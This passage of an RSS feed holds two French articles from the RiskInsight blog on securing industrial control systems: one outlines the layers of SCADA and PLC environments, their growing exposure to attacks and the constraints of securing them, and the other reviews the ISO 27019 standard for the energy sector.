										<content:encoded><![CDATA[<p align="left"><em>La sécurité des Systèmes d’Informations Industriels (SII) est aujourd’hui au centre des préoccupations dans les entreprises concernées. Ces systèmes qui permettent une action directe dans le monde «physique» à l’aide d’instructions provenant du monde « logique» pilotent les outils de production de nombreuses entreprises. Au-delà des risques environnementaux et humains, ils représentent également un enjeu stratégique pour les États. La récente multiplication des incidents nécessite donc de se mobiliser pour les sécuriser et d’amorcer une transformation. Mais par où commencer quand la sécurité a été laissée de côté pendant de nombreuses années ?</em></p>
<h2 align="left"> Des systèmes bien spécifiques&#8230;</h2>
<p align="left">Les SII permettent d’assurer le pilotage des outils de production (chaînes de montage, machines-outils, fours, scanners médicaux, climatisations, aiguillages, pipelines, etc.). De plus en plus ouverts, ils deviennent une vraie passerelle entre les processus de production et le Système d’Information de Gestion (SIG) de l’entreprise.Un SII est souvent modélisé en différentes  couches. La première couche concerne le  procédé physique lui-même. La seconde regroupe les capteurs, actuateurs, actionneurs et autres composants électroniques intelligents (IED) qui interagissent physiquement avec le procédé. La troisième couche assure la supervision et le pilotage du procédé. Elle est composée d’éléments tels que les SCADA (Supervisory Control and Data Acquisition), des automates ou PLC (Programmable Logic Controller) et des équipements distants, les RTU (Remote Terminal Unit). La quatrième couche regroupe les fonctions et outils de management des opérations de production.</p>
<p align="left">Enfin, la cinquième et dernière couche est tournée vers les fonctions avancées de planification, la logistique ou l’approvisionnement, souvent interfacée avec les ERP. Initialement développés pour l’industrie, les  systèmes construits sur le même modèle se sont largement répandus. Systèmes embarqués dans les voitures ou avions, imagerie  médicale (scanner, IRM, etc.), systèmes plus  étendus comme les smart grids, etc. : les SII sont devenus omniprésents !</p>
<h2 align="left"> &#8230;et des menaces accrues</h2>
<p>À l’origine les SII étaient isolés au sein d’un  site ou d’une usine, mais aujourd’hui ils  se doivent d’être largement interconnectés pour accroître productivité et compétitivité.<br />
Cette interconnexion permet de nombreux nouveaux usages mais augmente considérablement l’exposition aux cyberattaques. La majorité de ces systèmes n’ont en effet pas été conçus pour une ouverture sécurisée et sont d’autant plus vulnérables.</p>
<p>Ainsi, depuis plusieurs années les attaques d’États ou d’individus malveillants se multiplient. Les conséquences peuvent être considérables pour la sécurité des biens et des personnes, avec des scénarios graves menant par exemple au déversement de produits toxiques dans des systèmes de gestion des eaux ou l’explosion de pipelines. Des risques de confidentialité sont également présents : l’accès aux chaînes de production autorise l’accès à des secrets de fabrication industriels et le vol de propriété intellectuelle.</p>
<p>Les États réagissent pour faire face aux menaces sur ces systèmes. Sur le continent nord-Américain, la conformité au standard NERC-CIP est devenue obligatoire pour les opérateurs de réseaux électriques. En France, l’ANSSI a déjà lancé plusieurs initiatives qui visent à définir un cadre de protection minimum pour les installations les plus critiques. Les entreprises doivent donc dès maintenant se préparer pour être en capacité de répondre à ces nouvelles exigences.</p>
<h2> Penser la sécurité des SII différemment</h2>
<p>La sécurisation des SII nécessite d’intégrer de nouvelles contraintes pour définir des solutions adaptées. En effet, vouloir appliquer les bonnes pratiques de sécurité conventionnelles serait une erreur car les SI industriels présentent des caractéristiques différentes des SI de gestion.</p>
<p><strong>L’échelle de temps est bien spécifique.</strong> Les lignes de production sont souvent conçues pour une durée de vie de l’ordre de 10 à 15 ans, parfois même au-delà. Par exemple, dans certains secteurs comme celui des réseaux électriques, les équipements sont censés être en place pendant plusieurs dizaines d’années.</p>
<p><strong>La disponibilité et la sûreté sont au cœur des attentions</strong>. Dans cet univers spécifique, le critère de disponibilité est primordial. De plus, dans les environnements à risques (SEVESO, nucléaire, etc.) le maintien des fonctions de sûreté qui assurent la protection des hommeset de l’environnement est essentiel.</p>
<p><strong>Les fournisseurs imposent des solutions packagées de bout en bout.</strong> Et ils sont souvent réticents à appliquer les bonnes pratiques de sécurité, même lorsque leurs systèmes reposent sur des solutions peu sécurisées issues des SI de gestion&#8230; Si des améliorations ont déjà été notées, le chemin à parcourir reste long.</p>
<p><strong>Les contextes d’implantation sont particuliers et rendent le maintien en condition opérationnelle de la sécurité complexe.</strong> Il n’est pas rare d’avoir une partie du système (voire le système entier) localisée des sites distants, parfois inoccupés, difficiles d’accès, et où les conditions peuvent être « hostiles ».</p>
<p>Cela concerne par exemple les SII présents sur les plates-formes pétrolières, les pipelines gaziers ou pétroliers, ou encore les réseaux d’eau.</p>
<p>Dans ces conditions, comment initier une démarche de sécurisation ? Quelles sont les premières étapes ? (à suivre).</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/03/si-industriel-et-securite-oser-la-transformation-partie-1/">SI industriel et sécurité : oser la transformation  (partie 1)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sécuriser un SI Industriel : la norme ISO 27019 peut-elle (vraiment) vous aider ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/08/securiser-un-si-industriel-la-norme-iso-27019-peut-elle-vraiment-vous-aider/</link>
		
		<dc:creator><![CDATA[Anthony di Prima]]></dc:creator>
		<pubDate>Fri, 23 Aug 2013 10:06:57 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[iso 27002]]></category>
		<category><![CDATA[iso 27019]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[norme]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=4047</guid>

					<description><![CDATA[<p>L’ISO a publié le 17 juillet dernier l’ISO 27019 relative à la sécurité pour les systèmes de contrôle des procédés spécifiques à l&#8217;industrie de l&#8217;énergie. Cette nouvelle norme s’inscrit à la suite de publications de guide ou de référentiels en...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/08/securiser-un-si-industriel-la-norme-iso-27019-peut-elle-vraiment-vous-aider/">Sécuriser un SI Industriel : la norme ISO 27019 peut-elle (vraiment) vous aider ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>L’ISO a publié le 17 juillet dernier l’ISO 27019 relative à la sécurité pour les systèmes de contrôle des procédés spécifiques à l&rsquo;industrie de l&rsquo;énergie.</em></p>
<p><em>Cette nouvelle norme s’inscrit à la suite de publications de guide ou de référentiels en matière de sécurité des SI industriels. Qu’ils proviennent d’agences gouvernementales (NSA, BSI, ANSSI, ENISA), de différentes organisations sectorielles (AIEA, NERC…) ou d’organismes de normalisation et de standardisation nationaux ou internationaux (NIST, IEC, ISO), la plupart de ces documents s’adressent aux personnes en prise directe avec les systèmes industriels. Leur compréhension s’avère ainsi souvent difficile pour les RSSI ou DSI qui voient les réseaux industriels arriver dans leur périmètre.</em></p>
<p><em>Tous ces acteurs s’accordent néanmoins sur une chose :  une démarche volontaire de sécurisation des SI industriels est indispensable. La norme 27019 est-elle le bon outil pour cela ?  Que faut-il en retenir ?</em></p>
<h2>ISO 27019 : la petite sœur de l’ISO 27002 pour le secteur de l’énergie</h2>
<p>Cette norme se présente comme un complément à l’ISO 27002. Le document reprend la structure de ce guide de bonnes pratiques tout en y intégrant les spécificités des SI industriels, notamment par l’ajout de nouvelles sections.</p>
<p>L’ISO 27019 complète et donne des précisions quant à la mise en œuvre de mesures de sécurité dans le contexte particulier des systèmes industriels du secteur de l’énergie. Cependant, les informations qu’elle apporte s’appliquent à d’autres secteurs, dès lors que cohabitent SI bureautique et SI industriel.</p>
<p>Il s’agit donc d’une base de départ particulièrement utile pour un RSSI à qui revient la responsabilité de la sécurité sur le périmètre du système d’information industriel et qui ne sait pas par où commencer. Déjà familier des standards de la famille ISO 27000, il n’aura aucun mal à utiliser ce guide complémentaire.</p>
<h2>Un concentré de sécurité pour les SI Industriels</h2>
<p>En se focalisant uniquement sur les spécificités des SI industriels, l’ISO 27019 tente d’aller à l’essentiel. Parmi les mesures de sécurité qu’elle propose, nous pouvons relever les points suivants.</p>
<p>Les exigences d’inventaires sont précises et incluent <strong>des exemples</strong> <strong>d’actifs de type industriel</strong> (plans des réseaux de distributions, données de mesures et télémesures, données de paramétrage des équipements, SCADA, logiciel de gestion et d’optimisation de l’énergie, système de planification, automates, RTU, équipements de protection incendie et sismique, IED, capteurs…).</p>
<p>Le document  rappelle à plusieurs reprises à quel point il est essentiel de veiller à <strong>l’identification des risques relatifs à l’écosystème industriel</strong>. Les intégrateurs, fournisseurs et personnels de maintenance, l’interconnexion avec des systèmes tiers, la difficulté de protéger des équipements situés dans des lieux difficiles d’accès ou inoccupés, des lieux publics, ou encore des locaux de tiers sont mentionnés.</p>
<p>Les <strong>principes de cloisonnement </strong>sont largement abordés. Ils reposent sur les concepts de zones et de conduits mis en avant dans l’IEC 62443. Il s’agit alors d’envisager des zones plus ou moins étanches en fonction des niveaux de criticité de chaque pan du SI industriel et du SI de gestion.</p>
<p>L’ISO 27019 souligne également les risques provenant des <strong>systèmes dits « historiques »</strong>, potentiellement très vulnérables car rarement &#8211; voire jamais &#8211; tenus à jour. Il faut les identifier, en avoir une cartographie précise pour ensuite assurer une supervision et des contrôles adaptés, voire envisager d’en isoler certains.</p>
<p>En termes d’évolution du SI industriel, le recours à des simulateurs et des <strong>environnements dédiés de développements</strong> est recommandé sans pour autant être une obligation suivant le contexte. La mise en place de mesures particulières pour protéger les codes automates est également mentionnée.</p>
<p>Enfin, le fait de prendre en compte les <strong>aspects sécurité </strong>dans les contrats avec les tiers est précisé, en particulier <strong>avec les opérateurs télécoms</strong> : mesures de gestion de crises et de communication d’urgence en cas de <em>blackout</em>, anticipation du risque de surcharge&#8230;</p>
<p>Cette liste n’est certes pas exhaustive mais donne un premier aperçu de la déclinaison des mesures de l’ISO 27002 dans un contexte industriel. Une lecture détaillée est nécessaire pour appréhender ce sujet dans son ensemble.</p>
<h2>Au-delà de la sécurité, la nécessité d’intégrer les responsables sureté aux réflexions</h2>
<p>Des  mesures additionnelles concernent la <strong>problématique de « sûreté ».</strong> Tant au niveau d’un site et des bâtiments (localisation de salles, risque de séismes, inondation, manipulation de matières dangereuse, incendies…) qu’au niveau des installations (isolation et protection des systèmes de sureté, interdiction d’accès à distance, journalisation…), il est nécessaire pour le RSSI de travailler conjointement avec les équipes sureté en place. Il s’agit d’un facteur clé de succès de la sécurisation des SI Industriels.</p>
<h2>Alors, l’ISO 27019 peut-elle vraiment aider ?</h2>
<p>Les initiatives de l’ISO se veulent être des consensus. L’ISO 27019 permettra surtout de se poser les bonnes questions et de dresser un premier bilan de l’alignement de son SI industriel vis-à-vis de la norme. Toutes les réponses ne s’y trouvent certes pas, mais les questions soulevées incitent les RSSI et l’ensemble des responsables des SI industriels à réfléchir ensemble pour concevoir la sécurité des SI Industriels de demain.</p>
<p>Si l’ISO 27002 est devenue LA référence en matière de sécurité des SI d’entreprise, il est encore trop tôt pour se prononcer vis-à-vis de l’ISO 27019. De prochaines évolutions sont déjà à prévoir tout simplement parce que la structure adoptée est en ligne avec la version 2005 de l’ISO 27002. Une nouvelle version de l’ISO 27002 est attendue prochainement et sa structure a été entièrement revue.</p>
<p>Dans tous les cas, l’ISO 27019 est certainement le moyen le plus simple pour les RSSI d’aborder les spécificités des systèmes industriels !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/08/securiser-un-si-industriel-la-norme-iso-27019-peut-elle-vraiment-vous-aider/">Sécuriser un SI Industriel : la norme ISO 27019 peut-elle (vraiment) vous aider ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
